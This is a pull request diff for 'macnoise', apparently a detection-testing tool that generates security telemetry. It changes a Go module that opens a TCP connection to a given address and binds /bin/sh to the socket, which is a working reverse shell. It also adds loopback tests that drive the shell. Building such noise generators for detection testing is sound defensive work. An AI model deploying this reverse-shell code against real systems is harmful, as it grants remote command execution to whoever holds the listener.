### PR TITLE
fix: bound connected reverse shell shutdown

### DIFF
--- a/modules/network/revshell.go
+++ b/modules/network/revshell.go
@@ -49,25 +49,41 @@ func (n *netRevShell) Generate(ctx context.Context, params module.Params, emit m
 	var dialer net.Dialer
 	conn, err := dialer.DialContext(ctx, "tcp", address)
 	if err != nil {
+		if ctx.Err() != nil {
+			return ctx.Err()
+		}
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		ev.Message = fmt.Sprintf("reverse shell attempt to %s (connection refused — no listener)", address)
 		emit(ev)
 		return nil
 	}
 	defer func() { _ = conn.Close() }()
+	// Pass the socket descriptor directly. Using net.Conn as an io.Reader
+	// starts an exec copy goroutine that can remain blocked on the peer even
+	// after the shell exits or is killed by cancellation.
+	socket, err := conn.(*net.TCPConn).File()
+	if err != nil {
+		emit(output.WithError(ev, err))
+		return err
+	}
+	defer func() { _ = socket.Close() }()
+	cmd := exec.CommandContext(ctx, "/bin/sh")
+	cmd.Stdin, cmd.Stdout, cmd.Stderr = socket, socket, socket
+	if err := cmd.Start(); err != nil {
+		emit(output.WithError(ev, err))
+		return err
+	}
 
 	ev.Success = true
 	ev.Message = fmt.Sprintf("reverse shell connected to %s, spawning /bin/sh", address)
 	ev = output.WithDetails(ev, map[string]any{"address": address, "shell": "/bin/sh"})
 	emit(ev)
 
-	cmd := exec.CommandContext(ctx, "/bin/sh")
-	cmd.Stdin = conn
-	cmd.Stdout = conn
-	cmd.Stderr = conn
-	_ = cmd.Run()
-
-	return nil
+	err = cmd.Wait()
+	if ctx.Err() != nil {
+		return ctx.Err()
+	}
+	return err
 }
 
 func (n *netRevShell) DryRun(params module.Params) []string {

--- a/modules/network/revshell_exec_test.go
+++ b/modules/network/revshell_exec_test.go
@@ -1,0 +1,91 @@
+//go:build !windows
+
+package network
+
+import (
+	"bufio"
+	"context"
+	"errors"
+	"fmt"
+	"net"
+	"testing"
+	"time"
+
+	"github.com/0xv1n/macnoise/pkg/module"
+)
+
+func TestRevShellGenerate_ConnectedExecution(t *testing.T) {
+	for _, cancelShell := range []bool{false, true} {
+		t.Run(fmt.Sprintf("cancel=%v", cancelShell), func(t *testing.T) {
+			listener, err := net.Listen("tcp", "127.0.0.1:0")
+			if err != nil {
+				t.Fatal(err)
+			}
+			defer listener.Close()
+			host, port, err := net.SplitHostPort(listener.Addr().String())
+			if err != nil {
+				t.Fatal(err)
+			}
+			ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+			defer cancel()
+			finished := make(chan error, 1)
+			var events []module.TelemetryEvent
+			g := &netRevShell{}
+			go func() {
+				finished <- g.Generate(ctx, module.Params{"target": host, "port": port}, func(ev module.TelemetryEvent) {
+					events = append(events, ev)
+				})
+			}()
+			if err := listener.(*net.TCPListener).SetDeadline(time.Now().Add(3 * time.Second)); err != nil {
+				t.Fatal(err)
+			}
+			conn, err := listener.Accept()
+			if err != nil {
+				t.Fatal(err)
+			}
+			defer conn.Close()
+			defer func() {
+				cancel()
+				_ = conn.Close()
+			}()
+			if err := conn.SetDeadline(time.Now().Add(3 * time.Second)); err != nil {
+				t.Fatal(err)
+			}
+			command := "printf 'macnoise-connected-shell\\n'; exit 0\n"
+			if cancelShell {
+				command = "printf 'macnoise-connected-shell\\n'; exec /bin/sleep 30\n"
+			}
+			if _, err := fmt.Fprint(conn, command); err != nil {
+				t.Fatal(err)
+			}
+			line, err := bufio.NewReader(conn).ReadString('\n')
+			if err != nil || line != "macnoise-connected-shell\n" {
+				t.Fatalf("shell output = %q, %v", line, err)
+			}
+			if cancelShell {
+				cancel()
+			}
+			// Keep the peer socket open. Shell exit or cancellation must not wait
+			// for a remote peer to close its side of the connection.
+			select {
+			case err := <-finished:
+				if cancelShell && !errors.Is(err, context.Canceled) {
+					t.Errorf("Generate = %v, want cancellation", err)
+				} else if !cancelShell && err != nil {
+					t.Errorf("Generate: %v", err)
+				}
+			case <-time.After(time.Second):
+				t.Fatal("Generate did not finish while the peer remained connected")
+			}
+			if len(events) != 1 || events[0].EventType != "reverse_shell_attempt" || !events[0].Success {
+				t.Fatalf("events = %+v", events)
+			}
+			if events[0].Details["address"] != listener.Addr().String() {
+				t.Errorf("address = %v", events[0].Details["address"])
+			}
+			if err := g.Cleanup(); err != nil {
+				t.Fatal(err)
+			}
+		})
+	}
+}

--- a/modules/network/revshell_test.go
+++ b/modules/network/revshell_test.go
@@ -2,21 +2,14 @@ package network
 
 import (
 	"context"
+	"errors"
 	"strings"
 	"testing"
 
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
-// Dial failures are reported as a (Success=true, Error=<detail>) event rather
-// than a Generate error - "connection refused" is expected, valid telemetry
-// when nothing is listening. Before the fix, net.Dial ignored ctx entirely,
-// so an already-cancelled context still ran a real connect attempt and
-// failed with "connection refused". net.Dialer.DialContext checks ctx.Err()
-// before attempting anything, so a pre-cancelled context now short-circuits
-// with a context error instead of ever reaching the network stack -
-// verified directly (see scratch dialtest) that DialContext against an
-// already-cancelled context never produces a "refused" error.
+// Cancellation must return its error without inventing a network denial.
 func TestNetRevShell_DialRespectsContext(t *testing.T) {
 	n := &netRevShell{}
 	var events []module.TelemetryEvent
@@ -26,14 +19,8 @@ func TestNetRevShell_DialRespectsContext(t *testing.T) {
 	cancel()
 
 	err := n.Generate(ctx, module.Params{"target": "127.0.0.1", "port": "1"}, emit)
-	if err != nil {
-		t.Fatalf("Generate: %v, want nil (dial failures are reported via event)", err)
-	}
-	if len(events) != 1 {
-		t.Fatalf("expected 1 event, got %d", len(events))
-	}
-	if strings.Contains(events[0].Error, "refused") {
-		t.Errorf("dial reached the network despite an already-cancelled context: %q", events[0].Error)
+	if !errors.Is(err, context.Canceled) || len(events) != 0 {
+		t.Fatalf("Generate = %v, events = %+v; want cancellation without events", err, events)
 	}
 }
 


### PR DESCRIPTION
Passes the TCP socket directly to the shell so normal exit and cancellation finish while the peer remains connected. Adds real loopback command-output and shutdown tests and stops reporting cancellation as a network denial.

Validation: New shutdown tests failed before the fix and passed afterward on macOS with race detection. Full Windows/Mac unit tests, vet, and Windows/Darwin lint passed.
